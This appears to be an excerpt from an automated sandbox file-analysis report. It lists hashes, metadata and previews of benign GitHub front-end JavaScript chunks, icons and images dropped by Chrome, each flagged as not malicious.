                                                                                      SSDEEP:768:rQCe/NNFtmzJ6fCM01rvQJThDoqlzpZTXDPE967Ow:rQCe/NNFFfCM+AThDoqxpZTXDr7Ow
                                                                                      MD5:FC56234216F7AB16027E66715E8BA619
                                                                                      SHA1:D2A025085B429FCEFD4E72F94FBB85C996827430
                                                                                      SHA-256:6C23CB820422A033600041200811D3ACB7452A3FB9BD7600FDB7C253118D7FEF
                                                                                      SHA-512:1501D3EF83C29B7E19A8AF1EA5DC4B8B76BDCD0880E5D726E58F1EEE20D1AE05DEDF29EDA17D5ED44739225285C99289E8C238BE608475E8AA80F7BE875A0927
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_primer_react_lib-esm_ActionList_index_js"],{48030:(e,t,o)=>{o.d(t,{N:()=>r});let n={"outside-top":["outside-bottom","outside-right","outside-left","outside-bottom"],"outside-bottom":["outside-top","outside-right","outside-left","outside-bottom"],"outside-left":["outside-right","outside-bottom","outside-top","outside-bottom"],"outside-right":["outside-left","outside-bottom","outside-top","outside-bottom"]},i={start:["end","center"],end:["start","center"],center:["end","start"]};function r(e,t,o={}){let r=function(e){if(function(e){var t;if("DIALOG"===e.tagName)return!0;try{if(e.matches(":popover-open")&&/native code/.test(null===(t=document.body.showPopover)||void 0===t?void 0:t.toString()))return!0}catch(e){}return!1}(e))return document.body;let t=e.parentNode;for(;null!==t;){if(t instanceof HTMLElement&&"static"!==getComputedStyle(t).position)return t;t=t.parentNode}return document.body}(e)
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (8343)
                                                                                      Category:dropped
                                                                                      Size (bytes):16967
                                                                                      Entropy (8bit):5.378364199911628
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:0d4+EpG2QIgLoXImmmgH7Ywqsxyq4Io8NQqBwU5w10senqjdC:j+EpG2QIgLoXcmgbQsxKIrNQqRw10sej
                                                                                      MD5:2F497796C4A1138FB344EF33C095E8A0
                                                                                      SHA1:BB8354FACFC9B52A56D8E3B49B5BED1398DFF197
                                                                                      SHA-256:3BCBC1A7A6F8E83C9FEBF9156AD3B5BAA19F153A76F832FDC211A1894CD72EC6
                                                                                      SHA-512:244EE9D9ED779DD0DD2C7B846C0699EC84E675F1FF0BADA75D599488B5330D14174063FC07AC8938CD1DA53163C3D18B2D8C7585C651472737224A21524D116D
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["app_assets_modules_github_behaviors_ajax-error_ts-app_assets_modules_github_behaviors_include-467754","ui_packages_soft-navigate_soft-navigate_ts"],{58353:(e,t,r)=>{r.d(t,{H:()=>o,v:()=>a});var n=r(59753);function a(){let e=document.getElementById("ajax-error-message");e&&(e.hidden=!1)}function o(){let e=document.getElementById("ajax-error-message");e&&(e.hidden=!0)}(0,n.on)("deprecatedAjaxError","[data-remote]",function(e){let t=e.detail,{error:r,text:n}=t;e.currentTarget===e.target&&"abort"!==r&&"canceled"!==r&&(/<html/.test(n)?(a(),e.stopImmediatePropagation()):setTimeout(function(){e.defaultPrevented||a()},0))}),(0,n.on)("deprecatedAjaxSend","[data-remote]",function(){o()}),(0,n.on)("click",".js-ajax-error-dismiss",function(){o()})},58673:(e,t,r)=>{r.d(t,{I:()=>l,x:()=>s});var n=r(36162),a=r(36071),o=r(59753),i=r(56541);let d=new WeakMap;function l(e){let t=e.closest(".js-render-needs-enrichment");t&&(t.clas
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                      Category:dropped
                                                                                      Size (bytes):959
                                                                                      Entropy (8bit):4.180597116094789
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:tzBXuXMMuX1VJGRgH6NxGrLC+XLiZKnRqVfnv8zcaYMNUzFS:jN1VYRgH6/GrLdXLiYRqVn8zc3hS
                                                                                      MD5:6D802F68DF0C09A4997CFD28EEAFD9FF
                                                                                      SHA1:4B02307C306F900A46CB4F74D323C0386A4F5E53
                                                                                      SHA-256:6A9577CD4F7FA6B75BDE1025AF85B944E9DD1388373B55CCBA6E9F80AC2EAE60
                                                                                      SHA-512:C4923FCD6ABD14C9255C03B17033B66A0CED1EECB3E374FE5AD4E5364FF1E95AF728B623D9700E9F213C400A47CB561A6905AA2E42D5E9088FA6D0412A929B49
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:<svg width="32" height="32" viewBox="0 0 32 32" fill="none" xmlns="http://www.w3.org/2000/svg">.<path fill-rule="evenodd" clip-rule="evenodd" d="M16 0C7.16 0 0 7.16 0 16C0 23.08 4.58 29.06 10.94 31.18C11.74 31.32 12.04 30.84 12.04 30.42C12.04 30.04 12.02 28.78 12.02 27.44C8 28.18 6.96 26.46 6.64 25.56C6.46 25.1 5.68 23.68 5 23.3C4.44 23 3.64 22.26 4.98 22.24C6.24 22.22 7.14 23.4 7.44 23.88C8.88 26.3 11.18 25.62 12.1 25.2C12.24 24.16 12.66 23.46 13.12 23.06C9.56 22.66 5.84 21.28 5.84 15.16C5.84 13.42 6.46 11.98 7.48 10.86C7.32 10.46 6.76 8.82 7.64 6.62C7.64 6.62 8.98 6.2 12.04 8.26C13.32 7.9 14.68 7.72 16.04 7.72C17.4 7.72 18.76 7.9 20.04 8.26C23.1 6.18 24.44 6.62 24.44 6.62C25.32 8.82 24.76 10.46 24.6 10.86C25.62 11.98 26.24 13.4 26.24 15.16C26.24 21.3 22.5 22.66 18.94 23.06C19.52 23.56 20.02 24.52 20.02 26.02C20.02 28.16 20 29.88 20 30.42C20 30.84 20.3 31.34 21.1 31.18C27.42 29.06 32 23.06 32 16C32 7.16 24.84 0 16 0V0Z" fill="#24292E"/>.</svg>.
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):48
                                                                                      Entropy (8bit):4.527569011092752
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:YXhHWZaaA4HhU6dvLtYn:YwZsX6fYn
                                                                                      MD5:D2F7CEB39C92933060B53A0B6902FEAD
                                                                                      SHA1:BB8DAF0AA0F8B7DB7CF0372FE6BB56243C808575
                                                                                      SHA-256:1856B55D34E582FB7FE45DAAA233F2342E1826FE55FD0D88E6D3E4D85F39E159
                                                                                      SHA-512:379E97FCC1554B62FEC9594BC7B9EB5AFD51EC943FF78B6AA1A68E8AF67F6FBF1F3DE7B68D3C87D1E9B559A4BDA64E68286F47C1B58F58DC9DDB600B15B5478C
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:{"refs":["master"],"cacheKey":"v0:1496337548.0"}
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (12850)
                                                                                      Category:dropped
                                                                                      Size (bytes):12912
                                                                                      Entropy (8bit):5.197157340057198
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:12yv7wYLOJcPLuDX8BZyBu0JUIBabQWYFVMnoWgTIArdOxP7xt/EduVY4U3p/:lwY/iXKABOxjLguH8/
                                                                                      MD5:176403F7A580A1555F82D1351A17EF4C
                                                                                      SHA1:5F36D64A22D4ACC76586C9FB9E98269D25171C0F
                                                                                      SHA-256:8922A5FA32E5E1BCF394B9A3F5650242E488346E37149707F2E53A45F7056D68
                                                                                      SHA-512:352D84C6CC82775487E6344967259ACCD16972D5AC6062B41CC0E26947423E4D0EE0D324B31194F22985F36926BC159A235E38726B5FD5878B7492E1D1DB73FB
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["notifications-global"],{58353:(e,t,o)=>{o.d(t,{H:()=>l,v:()=>s});var i=o(59753);function s(){let e=document.getElementById("ajax-error-message");e&&(e.hidden=!1)}function l(){let e=document.getElementById("ajax-error-message");e&&(e.hidden=!0)}(0,i.on)("deprecatedAjaxError","[data-remote]",function(e){let t=e.detail,{error:o,text:i}=t;e.currentTarget===e.target&&"abort"!==o&&"canceled"!==o&&(/<html/.test(i)?(s(),e.stopImmediatePropagation()):setTimeout(function(){e.defaultPrevented||s()},0))}),(0,i.on)("deprecatedAjaxSend","[data-remote]",function(){l()}),(0,i.on)("click",".js-ajax-error-dismiss",function(){l()})},70152:(e,t,o)=>{var i,s=o(76006),l=o(58353),n=o(80702);function a(e,t,o,i){var s,l=arguments.length,n=l<3?t:null===i?i=Object.getOwnPropertyDescriptor(t,o):i;if("object"==typeof Reflect&&"function"==typeof Reflect.decorate)n=Reflect.decorate(e,t,o,i);else for(var a=e.length-1;a>=0;a--)(s=e[a])&&(n=(l<3
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:HTML document, ASCII text, with very long lines (9212)
                                                                                      Category:dropped
                                                                                      Size (bytes):9314
                                                                                      Entropy (8bit):5.147156122668849
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:a/MApuTOM88FycxOULECTi+wvqSqsp/og:JiuTOIFycbnwDp/h
                                                                                      MD5:D78D27B680BF7D289A87385F872628E7
                                                                                      SHA1:67E69BC1CCF75153399E6E70928D52DA4CEDAC5E
                                                                                      SHA-256:78BC56BEE97277DC9ADC570B7F58F97FD01FB973611F4A8BC2347C4852096AA9
                                                                                      SHA-512:6C210391E8F0EF19BD958919DE38B037488A02D6D94C7E58D700FADD402521CB770A24735A5319F26C69153EB404D6E04BC6C677A6A06CB0516B9361B517CF52
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["ui_packages_cookie-consent-element_cookie-consent-element_ts"],{62632:(e,o,t)=>{t.r(o),t.d(o,{CookieConsentElement:()=>s});var r,a=t(76006),i=t(63276);function n(e,o,t,r){var a,i=arguments.length,n=i<3?o:null===r?r=Object.getOwnPropertyDescriptor(o,t):r;if("object"==typeof Reflect&&"function"==typeof Reflect.decorate)n=Reflect.decorate(e,o,t,r);else for(var s=e.length-1;s>=0;s--)(a=e[s])&&(n=(i<3?a(n):i>3?a(o,t,n):a(o,t))||n);return i>3&&n&&Object.defineProperty(o,t,n),n}let s=(r=new WeakSet,class CookieConsentElement extends HTMLElement{connectedCallback(){(0,i.Wu)(),"true"===this.initialCookieConsentAllowed&&(0,i._$)()&&(function(e,o,t){if(!o.has(e))throw TypeError("attempted to get private field on non-instance");return t})(this,r,c).call(this)}constructor(...e){super(...e),function(e,o){(function(e,o){if(o.has(e))throw TypeError("Cannot initialize the same private elements twice on an object")})(e,o),o.add(e
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (14551)
                                                                                      Category:dropped
                                                                                      Size (bytes):16064
                                                                                      Entropy (8bit):5.410404601039084
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:4COODBCwuVgM2CIzcTCdp3Qe+vCBHuxpGCyBWQQCTFf/oEuJ9QOj:YODzuVgMszrIUHDBWqBuJxj
                                                                                      MD5:5FD24452250D6D35FE81EF2735B64998
                                                                                      SHA1:91DC58B709E82C3FD028BF4264600CD00E36FB31
                                                                                      SHA-256:943F03687C5F3E1893E7C8A4553801B5B2EF0EDEA9C553A90B92F83D63AC525D
                                                                                      SHA-512:C300384A527B6866CBB08F362E4147D6CE7C251C25A1146BE0BC49993B7B859AA95825C364CFE5BEE6A321661FBFBA000E56B633F0E4807CC1A49CB62DDBA1C0
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_primer_react_lib-esm_Text_Text_js-node_modules_primer_react_lib-esm_Text-7845da"],{50919:(e,t,n)=>{n.d(t,{h:()=>s});var i=n(67294),r=n(21413),o=n(7261),a=n(88216);function l(){return(l=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(e[i]=n[i])}return e}).apply(this,arguments)}let s=(0,i.forwardRef)(({sx:e=o.P,icon:t,...n},s)=>{let c=e,{size:d}=n;return null!==e&&Object.keys(e).length>0&&(c=(0,a.Z)({size:d},e)),i.createElement(r.X,l({icon:t,"data-component":"IconButton",sx:c,type:"button"},n,{ref:s}))})},74121:(e,t,n)=>{n.d(t,{Z:()=>c});var i=n(67294),r=n(15388),o=n(15173);function a(){return(a=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(e[i]=n[i])}return e}).apply(t
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (22526)
                                                                                      Category:dropped
                                                                                      Size (bytes):22613
                                                                                      Entropy (8bit):5.354941119441771
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:NOGgyC+3Tsu3CcrbClJWgwv8RlM+VfRHq19A3GpZSdHDqyoKh4wbZtYDWKVMdy:AGhCo3CcrbCu1v8TM+BgzAWpZSdHToK0
                                                                                      MD5:80FA30C00E347B5BBC8B7FF9DC2C9F44
                                                                                      SHA1:D085FE485ADA77814949E92FA9E1B1EB05BA5EDA
                                                                                      SHA-256:BE77C75CF182F1830D0F90B8D7AEE460F0108C6E7F5A143A524F709B9023C80D
                                                                                      SHA-512:6890E890956FAFA8187511DF1AC3C80A5B8D56BE5CA989DA251741F59C8D1186C0EFA3D374F113B0EBEDA124B78DEDD106EA97F487EC04CF2A012E7BDD1048B3
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_dompurify_dist_purify_js"],{27856:function(e){/*! @license DOMPurify 3.0.1 | (c) Cure53 and other contributors | Released under the Apache license 2.0 and Mozilla Public License 2.0 | github.com/cure53/DOMPurify/blob/3.0.1/LICENSE */e.exports=function(){"use strict";function e(t){return(e="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e})(t)}function t(e,n){return(t=Object.setPrototypeOf||function(e,t){return e.__proto__=t,e})(e,n)}function n(e,r,o){return(n=!function(){if("undefined"==typeof Reflect||!Reflect.construct||Reflect.construct.sham)return!1;if("function"==typeof Proxy)return!0;try{return Boolean.prototype.valueOf.call(Reflect.construct(Boolean,[],function(){})),!0}catch(e){return!1}}()?function(e,n,r){var o=[null];o.push.apply(o,n);var a=new(F
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                      Category:dropped
                                                                                      Size (bytes):958
                                                                                      Entropy (8bit):7.658357792937225
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:27/6nG9HpUcY59W8qxAkNf3RHOjfHNHUMo4fuec:27/6n6HpUD9Y6kDHGZoEuz
                                                                                      MD5:346E09471362F2907510A31812129CD2
                                                                                      SHA1:323B99430DD424604AE57A19A91F25376E209759
                                                                                      SHA-256:74CF90AC2FE6624AB1056CACEA11CF7ED4F8BEF54BBB0E869638013BBA45BC08
                                                                                      SHA-512:A62B0FCC02E671D6037725CF67935F8CA1C875F764CE39FED267420935C0B7BAD69AB50D3F9F8C628E9B3CFF439885EE416989E31CEAA5D32AE596DD7E5FEDBD
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:.PNG........IHDR... ... .....szz.....pHYs.................sRGB.........gAMA......a....SIDATx..W.M.@.~.l(.R.n`T".HM....4..d.......4........X"..!.T5.._...q.sHp.O.....?#,....V..BV.......!.a...!9.`W.._y.7Z./>+.T...h#..X..P.td.x../Q.-6_.=V...3..q.y.hi.".7...5..<I..:o...b.l.S8.y1.b.lkhS...y.<.{ ..9...........D.Q+g..y..BJ.........q?..(f.X.N..1u.h.I0..o....&Pp4..X..y.x.\o.......sb.,[i>...R.*...a..x.31H...a.....y.c.h.L.xN.8..x....0..{.).*...=...9af....u..a.e]w .X0.....8.A.J.....5.k.^.Y.kC..z...U.?.Hr,.`M..?.Y....9..y..,.v..iA.X..........D..B{7ae.....[.;b.x......[.kZ..'(...F9.....v?@GD.D.Bmw..[..^.kV.e.Bn...8x..n.r.9...>.s....JG-"-.N....t...(W.....u..Hh.....p..x.....k>..i...#.mt..:../..^C.t...B]x...Ob.K}X.x.....>h.7..~ ..FB.<.k@.$.%k.g.B$_.vB..g->$I...<^).Za].."ZB.'....yn(.....s!....n.X.*sh.peP....x,....P}..B' .K`..n.?...a .h({f...0..D..A.WU@g...f..y.....Qw..5.,.C...tQL........w.!......y|.....U:.?|....p.n....IEND.B`.
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):32
                                                                                      Entropy (8bit):4.413909765557392
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:HqSAhQkaKthrNQRY:KzhQqNNQ+
                                                                                      MD5:F4AB90326E08F93F8BC5EA0B64E41E5C
                                                                                      SHA1:6BBE17DACA56D17D24E94EA2F96C0033911BE337
                                                                                      SHA-256:21B550D08368ACD5F1B4BBE2CA4AE283BBCE867DAB5B4764C9FB1D6B8357EB4E
                                                                                      SHA-512:A9D4CA665B9E782AA5871BF11CE1C8C5F953807F6AE187030D6350144CC93163ED422EB9F1AF6F27ADE0A4A8D0EC8AAB6AC0C39AA4A085304B63F8838AF7D1E3
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:CgkKBw3UweD+GgAKCQoHDZFhlU4aAA==
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (15087)
                                                                                      Category:dropped
                                                                                      Size (bytes):15229
                                                                                      Entropy (8bit):5.273873832925916
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:VH82u/OSqONB2G3x0M3fEh0vbtA7YT7Axw8:V2hzY0voFxw8
                                                                                      MD5:3C93D840BDB31E2ECF2DB3A18D74ECFB
                                                                                      SHA1:9DBA0310DD02F294A15CE70E9DCF15BDD931B153
                                                                                      SHA-256:90811A711184795BC02F4D5C428192643B5721937943C790E950E9E353CDC310
                                                                                      SHA-512:4FECCA2D00E4933AFC4EC27C376010683C3E788034515793C7A275A9C7D60F742F10850F108FEA397F221436D2201F671F6416A4DEB5FC3CBEBCCDED871F979D
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_github_remote-form_dist_index_js-node_modules_scroll-anchoring_dist_scro-52dc4b"],{65935:(e,t,n)=>{let r;n.d(t,{AC:()=>u,rK:()=>o,uT:()=>a});let ErrorWithResponse=class ErrorWithResponse extends Error{constructor(e,t){super(e),this.response=t}};function i(){let e,t;let n=new Promise(function(n,r){e=n,t=r});return[n,e,t]}let s=[],l=[];function a(e){s.push(e)}function o(e){l.push(e)}function u(e,t){r||(r=new Map,"undefined"!=typeof document&&document.addEventListener("submit",d));let n=r.get(e)||[];r.set(e,[...n,t])}function d(e){if(!(e.target instanceof HTMLFormElement)||e.defaultPrevented)return;let t=e.target,n=function(e){let t=[];for(let n of r.keys())if(e.matches(n)){let e=r.get(n)||[];t.push(...e)}return t}(t);if(0===n.length)return;let a=function(e){let t={method:e.method||"GET",url:e.action,headers:new Headers({"X-Requested-With":"XMLHttpRequest"}),body:null};if("GET"===t.method.toUpp
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (8739)
                                                                                      Category:dropped
                                                                                      Size (bytes):8879
                                                                                      Entropy (8bit):5.098912069924506
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:RLKVU4mxI2ZK7i+1m4cbo3UIOQW4jfRw4:Rkpmm2ZP+c4dUIX/
                                                                                      MD5:913A77FA8F878B5F1B7BC5C3C53DAA45
                                                                                      SHA1:E2F68E5C24E77AB985603430E9666FC1718CADF7
                                                                                      SHA-256:69B7EF034DDC6B605311CA503CA24F54DE1758816EF270A160315ED71FC3D7E5
                                                                                      SHA-512:95B84EE6BC349A259AA1A1298245FF5EDB5CDD1B6F5013E0C5EFF8059C1F90125E8A1457C40C54CE103F4D18160A55CD7084922AE283BF00F8B425CFFD1EFA48
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_jtml_lib_index_js"],{98105:(e,t,n)=>{function s(e){let t=e.getBoundingClientRect();return{top:t.top+window.pageYOffset,left:t.left+window.pageXOffset}}function l(e){let t=e,n=t.ownerDocument;if(!n||!t.offsetParent)return;let s=n.defaultView.HTMLElement;if(t!==n.body){for(;t!==n.body;){if(!(t.parentElement instanceof s))return;t=t.parentElement;let{position:e,overflowY:n,overflowX:l}=getComputedStyle(t);if("fixed"===e||"auto"===n||"auto"===l||"scroll"===n||"scroll"===l)break}return t instanceof Document?null:t}}function i(e,t){let n=t,s=e.ownerDocument;if(!s)return;let l=s.documentElement;if(!l||e===l)return;let i=r(e,n);if(!i)return;n=i._container;let a=n===s.documentElement&&s.defaultView?{top:s.defaultView.pageYOffset,left:s.defaultView.pageXOffset}:{top:n.scrollTop,left:n.scrollLeft},o=i.top-a.top,u=i.left-a.left,c=n.clientHeight
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (32130)
                                                                                      Category:dropped
                                                                                      Size (bytes):42351
                                                                                      Entropy (8bit):5.2222946035370486
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:25qksALDHpoO+c5Z1I+unNZLkeh7L2YVDkqZBVefRvIYSPHPHrpOnI:nc+cBwmskqZBVefzgl
                                                                                      MD5:8BDEF75BA7A83517D539C1C39FF7CECB
                                                                                      SHA1:DE3A9B0D08D1609EFF1D8768EEF97A9335A18114
                                                                                      SHA-256:F1E60B381DF731DC780B5ABA391613077418362674010D3E88431AB6B08B5E74
                                                                                      SHA-512:C7885F4526C560464A87C9C1576765726A8E2926278809821BE0E5F163CD852CFD55F733F98F81E75DAE6D4543C83B33CFBBE62DA5725CF6A4931017598202F0
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_github_paste-markdown_dist_index_esm_js-node_modules_github_quote-select-cbac5f"],{52769:(e,t,n)=>{function i(e,t){var n,i,r;let a=e.value.slice(0,null!==(n=e.selectionStart)&&void 0!==n?n:void 0),o=e.value.slice(null!==(i=e.selectionEnd)&&void 0!==i?i:void 0),l=!0;e.contentEditable="true";try{l=document.execCommand("insertText",!1,t)}catch(e){l=!1}if(e.contentEditable="false",l&&!e.value.slice(0,null!==(r=e.selectionStart)&&void 0!==r?r:void 0).endsWith(t)&&(l=!1),!l){try{document.execCommand("ms-beginUndoUnit")}catch(e){}e.value=a+t+o;try{document.execCommand("ms-endUndoUnit")}catch(e){}e.dispatchEvent(new CustomEvent("change",{bubbles:!0,cancelable:!0}))}}n.d(t,{Ld:()=>H});let r=new WeakMap;function a(e){let{currentTarget:t}=e,n="KeyV"===e.code&&(e.ctrlKey||e.metaKey)&&e.shiftKey;(n||n&&e.altKey)&&r.set(t,!0)}function o(e){let{currentTarget:t}=e;r.delete(t)}function l(e){var t;let n=null!
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (9728)
                                                                                      Category:dropped
                                                                                      Size (bytes):9822
                                                                                      Entropy (8bit):5.146846961025199
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:MqRScO3EBtIMtJOTUUt6Ry3A9vnHFnH1/Diiqn0y4rnymwFNRBuiio9+f2J:Mq7yEBtxtJOTUUt6SAFHFVriJ0yAymw/
                                                                                      MD5:EA01BEA08A155FCF33FF2A18FCD0ECB9
                                                                                      SHA1:1F58607E282514D7A1DDDF9AEB2B91BC5F5FE7DD
                                                                                      SHA-256:ECEF9A63582229CEC2AD4531DE2FCBE4098FDBAC1FF41D7AD269FB47B3AD6352
                                                                                      SHA-512:94209C43E6AFE456A67E0FE26FF4F4BC8982137138891FD2AA1660150C4E03333187D63292EBF0D5AEE64D0C5F8F0E40421E21923E7588D5213D8892E8A207EB
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["app_assets_modules_github_sticky-scroll-into-view_ts"],{48683:(t,e,n)=>{n.d(e,{O4:()=>f,jo:()=>d,Qp:()=>u});var i=n(73061),o=n(59753);let l="ontransitionend"in window;function s(t){return"height"===getComputedStyle(t).transitionProperty}function a(t,e){t.style.transition="none",e(),t.offsetHeight,t.style.transition=""}var r=n(96776);function c(t,e){if(t.classList.toggle("open",e),t.classList.toggle("Details--on",e),e){let e=t.querySelector(".js-details-initial-focus");e&&setTimeout(()=>{e.focus()},0)}for(let n of[...t.querySelectorAll(".js-details-target")].filter(e=>e.closest(".js-details-container")===t))n.setAttribute("aria-expanded",e.toString())}function u(t,e){let n=t.getAttribute("data-details-container")||".js-details-container",i=t.closest(n),o=e?.force??!i.classList.contains("open"),u=e?.withGroup??!1;!function(t,e){if(!l){e();return}let n=Array.from(t.querySelectorAll(".js-transitionable"));for(let e
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (8499)
                                                                                      Category:dropped
                                                                                      Size (bytes):8642
                                                                                      Entropy (8bit):5.159862362274388
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:EuFacHnzJeIus4gtgFQbtmKyjQlWf756hoYwNUZV52xiCl:EugcHzJeI0XSbkKqAWftpYFZV4fl
                                                                                      MD5:586B5FA0648258F1111CE6EC1B3B5CC8
                                                                                      SHA1:40725879C9AD59E2013B50AB8B832DA259F32438
                                                                                      SHA-256:40C3EF6AA0C3B3FB02FA33FC5AAD01539CEBF14F2608723F75B2EA04E2E8A0AC
                                                                                      SHA-512:ADD939C751CE064CF6FE23578D3CB3F35756E15C71BAAE7298C29A6140EC53556702A1853CCB4D77BB0AC41287C22F15B8B1A85D405204947E793C9311C54D95
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_github_catalyst_lib_index_js-node_modules_github_hydro-analytics-client_-978abc0","vendors-node_modules_github_catalyst_lib_index_js-node_modules_github_hydro-analytics-client_-978abc1"],{76006:(e,t,n)=>{let o;n.d(t,{Lj:()=>b,Ih:()=>E,P4:()=>u,nW:()=>O,fA:()=>v,GO:()=>A});let r=new WeakSet,a=new WeakMap;function i(e=document){if(a.has(e))return a.get(e);let t=!1,n=new MutationObserver(e=>{for(let t of e)if("attributes"===t.type&&t.target instanceof Element)d(t.target);else if("childList"===t.type&&t.addedNodes.length)for(let e of t.addedNodes)e instanceof Element&&l(e)});n.observe(e,{childList:!0,subtree:!0,attributeFilter:["data-action"]});let o={get closed(){return t},unsubscribe(){t=!0,a.delete(e),n.disconnect()}};return a.set(e,o),o}function l(e){for(let t of e.querySelectorAll("[data-action]"))d(t);e instanceof Element&&e.hasAttribute("data-action")&&d(e)}function c(e){let t=e.currentTa
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:JPEG image data, baseline, precision 8, 40x40, components 3
                                                                                      Category:dropped
                                                                                      Size (bytes):954
                                                                                      Entropy (8bit):7.408709743075076
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:Q9YMFM0XxDuLHeOWXG427DAJuLHenX3f/FykVtrj26sMSjRKgsTaa0cWcB:Q9YM+uETA9FdY3reqncB
                                                                                      MD5:28CB06405CBD30B2BDD8405E56322FA4
                                                                                      SHA1:DDD8D076419440B6A982FCC1FF3D48423CCC3924
                                                                                      SHA-256:E4C31C10D95DBB7A2D38787B989FF010A9D891A028415272E0C21D607A6DD9C7
                                                                                      SHA-512:885628F8085E3D88968F97E2C62B9B704DEF9196E3501F2D939DB3192CCB7869A5BBA29146DF49FFC6A8D5F8F5B8E3E7866FDE02AC9DFC25599FB5DFDBACCEFA
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:......................................... $.' ",#..(7),01444.'9=82<.342...........2!.!22222222222222222222222222222222222222222222222222......(.(.."........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....2J...F....sL...^X.j.i..5..[vG..G# .t..&..u.>.k6.H...#......I....U...].....gu.....T..s..........u.s...k~..x.,..........lm.TR....RU.r9L..^..|4..Z...._,.N.[.0%..*..t?0 ...k.+....n|.z....t.y...${.b...k.r.k.kM.....*[I.q>.S...I..;.$M{.;.-..Ay..,......W...o.m.d.s..b(b.8..E..W.|G..|Q$..b.4.0...f.yo.s..V1.Y;~.5..y...t.B*+1`.:s..j.(..0..(...(...(...
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (35922)
                                                                                      Category:dropped
                                                                                      Size (bytes):37405
